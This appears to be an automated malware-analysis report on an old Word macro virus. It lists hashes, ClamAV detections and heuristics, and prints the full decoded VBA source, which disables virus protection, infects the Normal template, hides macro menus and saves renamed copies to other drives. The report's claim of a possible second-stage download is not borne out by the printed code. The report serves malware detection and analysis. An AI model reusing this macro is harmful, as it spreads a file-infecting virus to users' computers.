Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a4e0fc4195ae998…

MALICIOUS

Office (OLE)

32.0 KB Created: 1998-08-02 14:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d4511a7d55b9143261053fc1b6c6d2d7 SHA-1: 4482678dfef49d38a6e67d436313a54de72d6ace SHA-256: 4a4e0fc4195ae9980c74184e58abadf848379ff6a5eb3e6ec743177bb35e04e7
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains a Word document with a critical 'OLE_VBA_AUTOOPEN' heuristic firing, indicating the presence of an AutoOpen macro. The extracted VBA script, named 'Dream', attempts to export itself to 'c:\confi~1.~ys' and then import it into both the active document and the Normal template. This suggests an attempt to establish persistence and potentially download and execute a second-stage payload, aligning with the 'Doc.Trojan.Beauty-1' and 'Doc.Trojan.Dreams-1' ClamAV detections.

Heuristics 4

  • ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Beauty-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3551 bytes
SHA-256: f1bc3bfa1fc9cbdbbc50c1cee6ad0fef819f11ae710765279f7ab381d5a66aac
Detection
ClamAV: Doc.Trojan.Dreams-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Dream"


Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.Dream.AutoOpen"
  On Error Resume Next
  
  Options.VirusProtection = False
  Application.VBE.ActiveVBProject.VBComponents("Dream").Export "c:\confi~1.~ys"
  
  Application.ScreenUpdating = False
  Application.DisplayAlerts = wdAlertsNone
  
  
  CommandBars("tools").Controls("Macro").Delete
  CommandBars("tools").Controls("Templates and add-ins...").Delete
  ToolsOptionsGeneral.SendMailAttach = 1
  Set GlobalDoc = NormalTemplate
  Set ActiveDoc = ActiveDocument
  GlobalInstalled = False
  DocumentInstalled = False
  
  For j = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(j).Name = "Dream" Then
      GlobalInstalled = True
    End If
  Next
  
  For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(i).Name = "Dream" Then
      DocumentInstalled = True
    End If
  Next

   If DocumentInstalled = False And GlobalInstalled = True Then Set Dreamz = ActiveDocument.VBProject
   With Dreamz
With .VBComponents.Import("c:\confi~1.~ys")
End With
End With


If GlobalInstalled = False Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Dream", Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = False
  End If

If DocumentInstalled = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
  Reset
  Kill "c:\confi~1.~ys"
  
If (Day(Now)) = 21 Then
   
    Open "C:\Windows\Dreams.txt" For Output As 1
    Print #1, ".-=BadDReAms=-."
    Print #1, "When you sleep"
    Print #1, "Do you see an angel in the dying light"
    Print #1, "Or can you see someone standing outside"
    Print #1, "Trying to set you alight."
    Print #1, "Maybe you`ve seen Someone Somewhere before"
    Print #1, "That I might have loved had I never loved you"
    Print #1, "But you only see Me In bad dreams"
    Close 1
 End If
  

 Application.DisplayAlerts = wdAlertsAll
BadDreams:
End Sub

Sub FileOpen()
Call AutoOpen
With Dialogs(wdDialogFileOpen)
    .Show

End With

End Sub

Sub FileNew()
Call AutoOpen
With Dialogs(wdDialogFileNew)
  .Show
End With

End Sub

Sub FilePrint()
Call AutoOpen
With Dialogs(wdDialogFilePrint)
.Show
End With
End Sub

Sub FileExit()
On Error Resume Next


Call AutoOpen

Randomize
  ze = Int(Rnd * 7) + 1
  If ze = 1 Then zet$ = "hardcore.doc"
  If ze = 3 Then zet$ = "Heroinkills.doc"
  If ze = 2 Then zet$ = "Lesbians.doc"
  If ze = 4 Then zet$ = "Desire.doc"
  If ze = 5 Then zet$ = "Gravitykills.doc"
  If ze = 6 Then zet$ = "R.I.P-TaLoN.doc"
  If ze = 7 Then zet$ = "Hope.doc"
  
If (Day(Now)) >= 15 Then
ChangeFileOpenDirectory "f:"
        ActiveDocument.SaveAs FileName:=zet$, LockComments:=False, AddToRecentFiles:=False, ReadOnlyRecommended:=False
    
    ChangeFileOpenDirectory "C:"
    Application.Quit
Else
ChangeFileOpenDirectory "m:"
        ActiveDocument.SaveAs FileName:=zet$, LockComments:=False, AddToRecentFiles:=False, ReadOnlyRecommended:=False
ChangeFileOpenDirectory "c:"

Application.Quit
End If
FUCK:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.